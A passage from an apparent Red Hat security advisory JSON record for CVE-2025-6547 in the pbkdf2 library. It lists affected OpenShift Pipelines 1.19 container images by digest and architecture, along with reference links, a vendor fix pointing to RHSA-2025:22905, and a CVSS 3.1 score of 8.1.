"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-6547"
},
{
"category": "external",
"summary": "RHBZ#2374378",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2374378"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-6547",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6547"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-6547",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6547"
},
{
"category": "external",
"summary": "https://github.com/browserify/pbkdf2/commit/e3102a8cd4830a3ac85cd0dd011cc002fdde33bb",
"url": "https://github.com/browserify/pbkdf2/commit/e3102a8cd4830a3ac85cd0dd011cc002fdde33bb"
},
{
"category": "external",
"summary": "https://github.com/browserify/pbkdf2/security/advisories/GHSA-v62p-rq8g-8h59",
"url": "https://github.com/browserify/pbkdf2/security/advisories/GHSA-v62p-rq8g-8h59"
}
],
"release_date": "2025-06-23T19:00:45.472000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-09T10:09:13+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22905"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
